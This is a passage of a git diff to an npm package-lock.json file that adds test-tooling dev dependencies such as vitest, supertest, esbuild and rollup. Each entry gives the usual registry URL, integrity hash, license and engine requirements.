"^2.0.2", + "mime-types": "^2.1.12" + }, + "engines": { + "node": ">= 6" + } + }, + "node_modules/@types/supertest": { + "version": "6.0.3", + "resolved": "https://registry.npmjs.org/@types/supertest/-/supertest-6.0.3.tgz", + "integrity": "sha512-8WzXq62EXFhJ7QsH3Ocb/iKQ/Ty9ZVWnVzoTKc9tyyFRRF3a74Tk2+TLFgaFFw364Ere+npzHKEJ6ga2LzIL7w==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/methods": "^1.1.4", + "@types/superagent": "^8.1.0" + } + }, "node_modules/@types/tough-cookie": { "version": "4.0.5", "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", @@ -2318,6 +3190,109 @@ "dev": true, "license": "ISC" }, + "node_modules/@vitest/expect": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/@vitest/expect/-/expect-1.6.1.tgz", + "integrity": "sha512-jXL+9+ZNIJKruofqXuuTClf44eSpcHlgj3CiuNihUF3Ioujtmc0zIa3UJOW5RjDK1YLBJZnWBlPuqhYycLioog==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/spy": "1.6.1", + "@vitest/utils": "1.6.1", + "chai": "^4.3.10" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/runner": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/@vitest/runner/-/runner-1.6.1.tgz", + "integrity": "sha512-3nSnYXkVkf3mXFfE7vVyPmi3Sazhb/2cfZGGs0JRzFsPFvAMBEcrweV1V1GsrstdXeKCTXlJbvnQwGWgEIHmOA==", + "dev": true, + "license": "MIT", + "dependencies": { + "@vitest/utils": "1.6.1", + "p-limit": "^5.0.0", + "pathe": "^1.1.1" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/runner/node_modules/p-limit": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-5.0.0.tgz", + "integrity": "sha512-/Eaoq+QyLSiXQ4lyYV23f14mZRQcXnxfHrN0vCai+ak9G0pp9iEQukIIZq5NccEvwRB8PUnZT0KsOoDCINS1qQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "yocto-queue": "^1.0.0" + }, + "engines": { + "node": ">=18" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@vitest/runner/node_modules/yocto-queue": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/yocto-queue/-/yocto-queue-1.2.2.tgz", + "integrity": "sha512-4LCcse/U2MHZ63HAJVE+v71o7yOdIe4cZ70Wpf8D/IyjDKYQLV5GD46B+hSTjJsvV5PztjvHoU580EftxjDZFQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12.20" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/@vitest/snapshot": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/@vitest/snapshot/-/snapshot-1.6.1.tgz", + "integrity": "sha512-WvidQuWAzU2p95u8GAKlRMqMyN1yOJkGHnx3M1PL9Raf7AQ1kwLKg04ADlCa3+OXUZE7BceOhVZiuWAbzCKcUQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "magic-string": "^0.30.5", + "pathe": "^1.1.1", + "pretty-format": "^29.7.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/spy": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/@vitest/spy/-/spy-1.6.1.tgz", + "integrity": "sha512-MGcMmpGkZebsMZhbQKkAf9CX5zGvjkBTqf8Zx3ApYWXr3wG+QvEu2eXWfnIIWYSJExIp4V9FCKDEeygzkYrXMw==", + "dev": true, + "license": "MIT", + "dependencies": { + "tinyspy": "^2.2.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, + "node_modules/@vitest/utils": { + "version": "1.6.1", + "resolved": "https://registry.npmjs.org/@vitest/utils/-/utils-1.6.1.tgz", + "integrity": "sha512-jOrrUvXM4Av9ZWiG1EajNto0u96kWAhJ1LmPmJhXXQx/32MecEKd10pOLYgS2BQx1TgkGhloPU1ArDW2vvaY6g==", + "dev": true, + "license": "MIT", + "dependencies": { + "diff-sequences": "^29.6.3", + "estree-walker": "^3.0.3", + "loupe": "^2.3.7", + "pretty-format": "^29.7.0" + }, + "funding": { + "url": "https://opencollective.com/vitest" + } + }, "node_modules/abbrev": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz", @@ -2500,6 +3475,23 @@ "node": ">=8" } }, + "node_modules/asap": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/asap/-/asap-2.0.6.tgz", + "integrity": "sha512-BSHWgDSAiKs50o2Re8ppvp3seVHXSRM44cdSsT9FfNEUUZLOGWVCsiWaRPWM1Znn+mqZ1OfVZ3z3DWEzSp7hRA==", + "dev": true, + "license": "MIT" + }, + "node_modules/assertion-error": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/assertion-error/-/assertion-error-1.1.0.tgz", + "integrity": "sha512-jgsaNduz+ndvGyFt3uSuWqvy4lCnIJiovtouQN5JZHOKCS2QuhEdbcQHFhVksz2N2U9hXJo8odG7ETyWlEeuDw==", + "dev": true, + "license": "MIT", + "engines": { + "node": "*" + } + }, "node_modules/async-retry": { "version": "1.3.3", "resolved": "https://registry.npmjs.org/async-retry/-/async-retry-1.3.3.tgz", @@ -2841,6 +3833,16 @@ "node": ">= 0.8" } }, + "node_modules/cac": { + "version": "6.7.14", + "resolved": "https://registry.npmjs.org/cac/-/cac-6.7.14.tgz", + "integrity": "sha512-b6Ilus+c3RrdDk+JhLKUAQfzzgLEPy6wcXqS7f/xe1EETvsDP6GORG7SFuOs6cID5YkqchW/LXZbX5bc8j7ZcQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=8" + } + }, "node_modules/call-bind-apply-helpers": { "version": "1.0.2", "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", @@ -2918,6 +3920,25 @@ ], "license": "CC-BY-4.0" }, + "node_modules/chai": { + "version": "4.5.0", + "resolved": "https://registry.npmjs.org/chai/-/chai-4.5.0.tgz", + "integrity": "sha512-RITGBfijLkBddZvnn8jdqoTypxvqbOLYQkGGxXzeFjVHvudaPw0HNFD9x928/eUwYWd2dPCugVqspGALTZZQKw==", + "dev": true, + "license": "MIT", + "dependencies": { + "assertion-error": "^1.1.0", + "check-error": "^1.0.3", + "deep-eql": "^4.1.3", + "get-func-name": "^2.0.2", + "loupe": "^2.3.6", + "pathval": "^1.1.1", + "type-detect": "^4.1.0" + }, + "engines": { + "node": ">=4" + } + }, "node_modules/chalk": { "version": "4.1.2", "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", @@ -2935,6 +3956,19 @@ "url": "https://github.com/chalk/chalk?sponsor=1" } }, + "node_modules/check-error": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/check-error/-/check-error-1.0.3.tgz", + "integrity": "sha512-iKEoDYaRmd1mxM90a2OEfWhjsjPpYPuQ+lMYsoxB126+t8fw7ySEO48nmDg5COTjxDI65/Y2OWpeEHk3ZOe8zg==", + "dev": true, + "license": "MIT", + "dependencies": { + "get-func-name": "^2.0.2" + }, + "engines": { + "node": "*" + } + }, "node_modules/chokidar": { "version": "3.6.0", "resolved": "https://registry.npmjs.org/chokidar/-/chokidar-3.6.0.tgz", @@ -3068,6 +4102,16 @@ "node": ">=14" } }, + "node_modules/component-emitter": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.1.tgz", + "integrity": "sha512-T0+barUSQRTUQASh8bx02dl+DhF54GtIDY13Y3m9oWTklKbb3Wv974meRpeZ3lp1JpLVECWWNHC4vaG2XHXouQ==", + "dev": true, + "license": "MIT", + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", @@ -3120,6 +4164,13 @@ "safe-buffer": "~5.1.0" } }, + "node_modules/confbox": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/confbox/-/confbox-0.1.8.tgz", + "integrity": "sha512-RMtmw0iFkeR4YV+fUOSucriAQNb9g8zFR52MWCtl+cCZOFRNL6zeB395vPzFhEjjn4fMxXudmELnl/KF/WrK6w==", + "dev": true, + "license": "MIT" + }, "node_modules/config-chain": { "version": "1.1.13", "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", @@ -3157,6 +4208,13 @@ "integrity": "sha512-NXdYc3dLr47pBkpUCHtKSwIOQXLVn8dZEuywboCOJY/osA0wFSLlSawr3KN8qXJEyX66FcONTH8EIlVuK0yyFA==", "license": "MIT" }, + "node_modules/cookiejar": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/cookiejar/-/cookiejar-2.1.4.tgz", + "integrity": "sha512-LDx6oHrK+PhzLKJU9j5S7/Y3jM/mUHvD/DeI1WQmJn652iPC5Y4TBzC9l+5OMOXlyTTA+SmVUPm0HQUwpD5Jqw==", + "dev": true, + "license": "MIT" + }, "node_modules/core-util-is": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.3.tgz", @@ -3393,6 +4451,19 @@ "integrity": "sha512-qIMFpTMZmny+MMIitAB6D7iVPEorVw6YQRWkvarTkT4tBeSLLiHzcwj6q0MmYSFCiVpiqPJTJEYIrpcPzVEIvg==", "license": "MIT" }, + "node_modules/deep-eql": { + "version": "4.1.4", + "resolved": "https://registry.npmjs.org/deep-eql/-/deep-eql-4.1.4.tgz", + "integrity": "sha512-SUwdGfqdKOwxCPeVYjwSyRpJ7Z+fhpwIAtmCUdZIWZ/YP5R9WAsyuSgpLVDi9bjWoN2LXHNss/dk3urXtdQxGg==", + "dev": true, + "license": "MIT", + "dependencies": { + "type-detect": "^4.0.0" + }, + "engines": { + "node": ">=6" + } + }, "node_modules/deep-is": { "version": "0.1.4", "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", @@ -3455,6 +4526,17 @@ "node": ">=8" } }, + "node_modules/dezalgo": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/dezalgo/-/dezalgo-1.0.4.tgz", + "integrity": "sha512-rXSP0bf+5n0Qonsb+SVVfNfIsimO4HEtmnIpPHY8Q1UCzKlQrDMfdobr8nJOOsRgWCyMRqeSBQzmWUMq7zvVig==", + "dev": true, + "license": "ISC", + "dependencies": { + "asap": "^2.0.0", + "wrappy": "1" + } + }, "node_modules/dfa": { "version": "1.2.0", "resolved": "https://registry.npmjs.org/dfa/-/dfa-1.2.0.tgz", @@ -3477,6 +4559,16 @@ "node": ">=0.3.1" } }, + "node_modules/diff-sequences": { + "version": "29.6.3", + "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", + "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, "node_modules/dijkstrajs": { "version": "1.0.3", "resolved": "https://registry.npmjs.org/dijkstrajs/-/dijkstrajs-1.0.3.tgz", @@ -3807,6 +4899,45 @@ "node": ">= 0.4" } }, + "node_modules/esbuild": { + "version": "0.21.5", + "resolved": "https://registry.npmjs.org/esbuild/-/esbuild-0.21.5.tgz", + "integrity": "sha512-mg3OPMV4hXywwpoDxu3Qda5xCKQi+vCTZq8S9J/EpkhB2HzKXq4SNFZE3+NK93JYxc8VMSep+lOUSC/RVKaBqw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "bin": { + "esbuild": "bin/esbuild" + }, + "engines": { + "node": ">=12" + }, + "optionalDependencies": { + "@esbuild/aix-ppc64": "0.21.5", + "@esbuild/android-arm": "0.21.5", + "@esbuild/android-arm64": "0.21.5", + "@esbuild/android-x64": "0.21.5", + "@esbuild/darwin-arm64": "0.21.5", + "@esbuild/darwin-x64": "0.21.5", + "@esbuild/freebsd-arm64": "0.21.5", + "@esbuild/freebsd-x64": "0.21.5", + "@esbuild/linux-arm": "0.21.5", + "@esbuild/linux-arm64": "0.21.5", + "@esbuild/linux-ia32": "0.21.5", + "@esbuild/linux-loong64": "0.21.5", + "@esbuild/linux-mips64el": "0.21.5", + "@esbuild/linux-ppc64": "0.21.5", + "@esbuild/linux-riscv64": "0.21.5", + "@esbuild/linux-s390x": "0.21.5", + "@esbuild/linux-x64": "0.21.5", + "@esbuild/netbsd-x64": "0.21.5", + "@esbuild/openbsd-x64": "0.21.5", + "@esbuild/sunos-x64": "0.21.5", + "@esbuild/win32-arm64": "0.21.5", + "@esbuild/win32-ia32": "0.21.5", + "@esbuild/win32-x64": "0.21.5" + } + }, "node_modules/escalade": { "version": "3.2.0", "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", @@ -3976,6 +5107,16 @@ "node": ">=4.0" } }, + "node_modules/estree-walker": { + "version": "3.0.3", + "resolved": "https://registry.npmjs.org/estree-walker/-/estree-walker-3.0.3.tgz", + "integrity": "sha512-7RUKfXgSMMkzt6ZuXmqapOurLGPPfgj6l9uRZ7lRGolvk0y2yocc35LdcxKC5PQZdn2DMqioAQ2NoWcrTKmm6g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "^1.0.0" + } + }, "node_modules/esutils": { "version": "2.0.3", "resolved": "https://registry.npmjs.org/esutils/-/esutils-2.0.3.tgz", @@ -4020,6 +5161,43 @@ "node": ">=0.8.x" } }, + "node_modules/execa": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/execa/-/execa-8.0.1.tgz", + "integrity": "sha512-VyhnebXciFV2DESc+p6B+y0LjSm0krU4OgJN44qFAhBY0TJ+1V61tYD2+wHusZ6F9n5K+vl8k0sTy7PEfV4qpg==", + "dev": true, + "license": "MIT", + "dependencies": { + "cross-spawn": "^7.0.3", + "get-stream": "^8.0.1", + "human-signals": "^5.0.0", + "is-stream": "^3.0.0", + "merge-stream": "^2.0.0", + "npm-run-path": "^5.1.0", + "onetime": "^6.0.0", + "signal-exit": "^4.1.0", + "strip-final-newline": "^3.0.0" + }, + "engines": { + "node": ">=16.17" + }, + "funding": { + "url": "https://github.com/sindresorhus/execa?sponsor=1" + } + }, + "node_modules/execa/node_modules/is-stream": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-stream/-/is-stream-3.0.0.tgz", + "integrity": "sha512-LnQR4bZ9IADDRSkvpqMGvt/tEJWclzklNgSw48V5EAaAeDd6qGvN8ei6k5p0tvxSR171VmGyHuTiAOfxAbr8kA==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/express": { "version": "4.22.1", "resolved": "https://registry.npmjs.org/express/-/express-4.22.1.tgz", @@ -4181,6 +5359,13 @@ "dev": true, "license": "MIT" }, + "node_modules/fast-safe-stringify": { + "version": "2.1.1", + "resolved": "https://registry.npmjs.org/fast-safe-stringify/-/fast-safe-stringify-2.1.1.tgz", + "integrity": "sha512-W+KJc2dmILlPplD/H4K9l9LcAHAfPtP6BY84uVLXQ6Evcz9Lcg33Y2z1IVblT6xdY54PXYVHEv+0Wpq8Io6zkA==", + "dev": true, + "license": "MIT" + }, "node_modules/fast-xml-builder": { "version": "1.1.5", "resolved": "https://registry.npmjs.org/fast-xml-builder/-/fast-xml-builder-1.1.5.tgz", @@ -4447,6 +5632,24 @@ "node": ">= 0.12" } }, + "node_modules/formidable": { + "version": "3.5.4", + "resolved": "https://registry.npmjs.org/formidable/-/formidable-3.5.4.tgz", + "integrity": "sha512-YikH+7CUTOtP44ZTnUhR7Ic2UASBPOqmaRkRKxRbywPTe5VxF7RRCck4af9wutiZ/QKM5nME9Bie2fFaPz5Gug==", + "dev": true, + "license": "MIT", + "dependencies": { + "@paralleldrive/cuid2": "^2.2.2", + "dezalgo": "^1.0.4", + "once": "^1.4.0" + }, + "engines": { + "node": ">=14.0.0" + }, + "funding": { + "url": "https://ko-fi.com/tunnckoCore/commissions" + } + }, "node_modules/forwarded": { "version": "0.2.0", "resolved": "https://registry.npmjs.org/forwarded/-/forwarded-0.2.0.tgz", @@ -4571,6 +5774,16 @@ "node": "6.* || 8.* || >= 10.*" } }, + "node_modules/get-func-name": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/get-func-name/-/get-func-name-2.0.2.tgz", + "integrity": "sha512-8vXOvuE167CtIc3OyItco7N/dpRtBbYOsPsXCz7X/PMnlGjYjSGuZJgM1Y7mmew7BKf9BqvLX2tnOVy1BBUsxQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": "*" + } + }, "node_modules/get-intrinsic": { "version": "1.3.0", "resolved": "https://registry.npmjs.org/get-intrinsic/-/get-intrinsic-1.3.0.tgz", @@ -4608,6 +5821,19 @@ "node": ">= 0.4" } }, + "node_modules/get-stream": { + "version": "8.0.1", + "resolved": "https://registry.npmjs.org/get-stream/-/get-stream-8.0.1.tgz", + "integrity": "sha512-VaUJspBffn/LMCJVoMvSAdmscJyS1auj5Zulnn5UoYcY531UWmdwhRWkcGKnGU93m5HSXP9LP2usOryrBtQowA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/glob": { "version": "7.2.3", "resolved": "https://registry.npmjs.org/glob/-/glob-7.2.3.tgz", @@ -4957,6 +6183,16 @@ "node": ">= 14" } }, + "node_modules/human-signals": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/human-signals/-/human-signals-5.0.0.tgz", + "integrity": "sha512-AXcZb6vzzrFAUE61HnN4mpLqd/cSIwNQjtNWR0euPm6y0iqx3G4gOXaIDdtdDwZmhwe82LA6+zinmW4UBWVePQ==", + "dev": true, + "license": "Apache-2.0", + "engines": { + "node": ">=16.17.0" + } + }, "node_modules/hyphen": { "version": "1.14.1", "resolved": "https://registry.npmjs.org/hyphen/-/hyphen-1.14.1.tgz", @@ -5507,6 +6743,23 @@ "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", "license": "MIT" }, + "node_modules/local-pkg": { + "version": "0.5.1", + "resolved": "https://registry.npmjs.org/local-pkg/-/local-pkg-0.5.1.tgz", + "integrity": "sha512-9rrA30MRRP3gBD3HTGnC6cDFpaE1kVDWxWgqWJUN0RvDNAo+Nz/9GxB+nHOH0ifbVFy0hSA1V6vFDvnx54lTEQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "mlly": "^1.7.3", + "pkg-types": "^1.2.1" + }, + "engines": { + "node": ">=14" + }, + "funding": { + "url": "https://github.com/sponsors/antfu" + } + }, "node_modules/locate-path": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-6.0.0.tgz", @@ -5622,6 +6875,16 @@ "loose-envify": "cli.js" } }, + "node_modules/loupe": { + "version": "2.3.7", + "resolved": "https://registry.npmjs.org/loupe/-/loupe-2.3.7.tgz", + "integrity": "sha512-zSMINGVYkdpYSOBmLi0D1Uo7JU9nVdQKrHxC8eYlV+9YKK9WePqAlL7lSlorG/U2Fw1w0hTBmaa/jrQ3UbPHtA==", + "dev": true, + "license": "MIT", + "dependencies": { + "get-func-name": "^2.0.1" + } + }, "node_modules/lru-cache": { "version": "6.0.0", "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", @@ -5653,6 +6916,16 @@ "react": "^16.5.1 || ^17.0.0 || ^18.0.0" } }, + "node_modules/magic-string": { + "version": "0.30.21", + "resolved": "https://registry.npmjs.org/magic-string/-/magic-string-0.30.21.tgz", + "integrity": "sha512-vd2F4YUyEXKGcLHoq+TEyCjxueSeHnFxyyjNp80yg0XV4vUhnDer/lvvlqM/arB5bXQN5K2/3oinyCRyx8T2CQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jridgewell/sourcemap-codec": "^1.5.5" + } + }, "node_modules/make-error": { "version": "1.3.6", "resolved": "https://registry.npmjs.org/make-error/-/make-error-1.3.6.tgz", @@ -5693,6 +6966,13 @@ "url": "https://github.com/sponsors/sindresorhus" } }, + "node_modules/merge-stream": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", + "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", + "dev": true, + "license": "MIT" + }, "node_modules/merge2": { "version": "1.4.1", "resolved": "https://registry.npmjs.org/merge2/-/merge2-1.4.1.tgz", @@ -5758,6 +7038,19 @@ "node": ">= 0.6" } }, + "node_modules/mimic-fn": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-4.0.0.tgz", + "integrity": "sha512-vqiC06CuhBTUdZH+RYl8sFrL096vA45Ok5ISO6sE/Mr1jRbGH4Csnhi8f3wKVl7x8mO4Au7Ir9D3Oyv1VYMFJw==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/minimatch": { "version": "3.1.5", "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.5.tgz", @@ -5801,6 +7094,26 @@ "mkdirp": "bin/cmd.js" } }, + "node_modules/mlly": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/mlly/-/mlly-1.8.2.tgz", + "integrity": "sha512-d+ObxMQFmbt10sretNDytwt85VrbkhhUA/JBGm1MPaWJ65Cl4wOgLaB1NYvJSZ0Ef03MMEU/0xpPMXUIQ29UfA==", + "dev": true, + "license": "MIT", + "dependencies": { + "acorn": "^8.16.0", + "pathe": "^2.0.3", + "pkg-types": "^1.3.1", + "ufo": "^1.6.3" + } + }, + "node_modules/mlly/node_modules/pathe": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz", + "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==", + "dev": true, + "license": "MIT" + }, "node_modules/morgan": { "version": "1.10.1", "resolved": "https://registry.npmjs.org/morgan/-/morgan-1.10.1.tgz", @@ -6102,6 +7415,35 @@ "svg-arc-to-cubic-bezier": "^3.0.0" } }, + "node_modules/npm-run-path": { + "version": "5.3.0", + "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-5.3.0.tgz", + "integrity": "sha512-ppwTtiJZq0O/ai0z7yfudtBpWIoxM8yE6nHi1X47eFR2EWORqfbu6CnPlNsjeN683eT0qG6H/Pyf9fCcvjnnnQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "path-key": "^4.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/npm-run-path/node_modules/path-key": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/path-key/-/path-key-4.0.0.tgz", + "integrity": "sha512-haREypq7xkM7ErfgIyA0z+Bj4AGKlMSdlQE2jvJo6huWD1EdkKYV+G/T4nq0YEF2vgTT8kqMFKo1uHn950r4SQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/object-assign": { "version": "4.1.1", "resolved": "https://registry.npmjs.org/object-assign/-/object-assign-4.1.1.tgz", @@ -6163,6 +7505,22 @@ "wrappy": "1" } }, + "node_modules/onetime": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/onetime/-/onetime-6.0.0.tgz", + "integrity": "sha512-1FlR+gjXK7X+AsAHso35MnyN5KqGwJRi/31ft6x0M194ht7S+rWAvd7PHss9xSKMzE0asv1pyIHaJYq+BbacAQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "mimic-fn": "^4.0.0" + }, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, "node_modules/optionator": { "version": "0.9.4", "resolved": "https://registry.npmjs.org/optionator/-/optionator-0.9.4.tgz", @@ -6364,6 +7722,23 @@ "integrity": "sha512-A/AGNMFN3c8bOlvV9RreMdrv7jsmF9XIfDeCd87+I8RNg6s78BhJxMu69NEMHBSJFxKidViTEdruRwEk/WIKqA==", "license": "MIT" }, + "node_modules/pathe": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-1.1.2.tgz", + "integrity": "sha512-whLdWMYL2TwI08hn8/ZqAbrVemu0LNaNNJZX73O6qaIdCTfXutsLhMkjdENX0qhsQ9uIimo4/aQOmXkoon2nDQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/pathval": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/pathval/-/pathval-1.1.1.tgz", + "integrity": "sha512-Dp6zGqpTdETdR63lehJYPeIOqpiNBNtc7BpWSLrOje7UaIsE5aY92r/AunQA7rsXvet3lrJ3JnZX29UPTKXyKQ==", + "dev": true, + "license": "MIT", + "engines": { + "node": "*" + } + }, "node_modules/peberminta": { "version": "0.9.0", "resolved": "https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz", @@ -6409,6 +7784,25 @@ "node": ">= 6" } }, + "node_modules/pkg-types": { + "version": "1.3.1", + "resolved": "https://registry.npmjs.org/pkg-types/-/pkg-types-1.3.1.tgz", + "integrity": "sha512-/Jm5M4RvtBFVkKWRu2BLUTNP8/M2a+UwuAX+ae4770q1qVGtfjG+WTCupoZixokjmHiry8uI+dlY8KXYV5HVVQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "confbox": "^0.1.8", + "mlly": "^1.7.4", + "pathe": "^2.0.1" + } + }, + "node_modules/pkg-types/node_modules/pathe": { + "version": "2.0.3", + "resolved": "https://registry.npmjs.org/pathe/-/pathe-2.0.3.tgz", + "integrity": "sha512-WUjGcAqP1gQacoQe+OBJsFA7Ld4DyXuUIjZ5cc75cLHvJ7dtNsTugphxIADwspS+AraAUePCKrSVtPLFj/F88w==", + "dev": true, + "license": "MIT" + }, "node_modules/png-js": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz", @@ -6608,6 +8002,41 @@ "url": "https://github.com/prettier/prettier?sponsor=1" } }, + "node_modules/pretty-format": { + "version": "29.7.0", + "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.7.0.tgz", + "integrity": "sha512-Pdlw/oPxN+aXdmM9R00JVC9WVFoCLTKJvDVLgmJ+qAffBMxsV85l/Lu7sNx4zSzPyoL2euImuEwHhOXdEgNFZQ==", + "dev": true, + "license": "MIT", + "dependencies": { + "@jest/schemas": "^29.6.3", + "ansi-styles": "^5.0.0", + "react-is": "^18.0.0" + }, + "engines": { + "node": "^14.15.0 || ^16.10.0 || >=18.0.0" + } + }, + "node_modules/pretty-format/node_modules/ansi-styles": { + "version": "5.2.0", + "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", + "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/ansi-styles?sponsor=1" + } + }, + "node_modules/pretty-format/node_modules/react-is": { + "version": "18.3.1", + "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.3.1.tgz", + "integrity": "sha512-/LLMVyas0ljjAtoYiPqYiL8VWXzUUdThrmU5+n20DZv+a+ClRoevUzw5JxU+Ieh5/c87ytoTBV9G1FiKfNJdmg==", + "dev": true, + "license": "MIT" + }, "node_modules/prisma": { "version": "5.22.0", "resolved": "https://registry.npmjs.org/prisma/-/prisma-5.22.0.tgz", @@ -7230,6 +8659,58 @@ "url": "https://github.com/sponsors/isaacs" } }, + "node_modules/rollup": { + "version": "4.60.4", + "resolved": "https://registry.npmjs.org/rollup/-/rollup-4.60.4.tgz", + "integrity": "sha512-WHeFSbZYsPu3+bLoNRUuAO+wavNlocOPf3wSHTP7hcFKVnJeWsYlCDbr3mTS14FCizf9ccIxXA8sGL8zKeQN3g==", + "dev": true, + "license": "MIT", + "dependencies": { + "@types/estree": "1.0.8" + }, + "bin": { + "rollup": "dist/bin/rollup" + }, + "engines": { + "node": ">=18.0.0", + "npm": ">=8.0.0" + }, + "optionalDependencies": { + "@rollup/rollup-android-arm-eabi": "4.60.4", + "@rollup/rollup-android-arm64": "4.60.4", + "@rollup/rollup-darwin-arm64": "4.60.4", + "@rollup/rollup-darwin-x64": "4.60.4", + "@rollup/rollup-freebsd-arm64": "4.60.4", + "@rollup/rollup-freebsd-x64": "4.60.4", + "@rollup/rollup-linux-arm-gnueabihf": "4.60.4", + "@rollup/rollup-linux-arm-musleabihf": "4.60.4", + "@rollup/rollup-linux-arm64-gnu": "4.60.4", + "@rollup/rollup-linux-arm64-musl": "4.60.4", + "@rollup/rollup-linux-loong64-gnu": "4.60.4", + "@rollup/rollup-linux-loong64-musl": "4.60.4", + "@rollup/rollup-linux-ppc64-gnu": 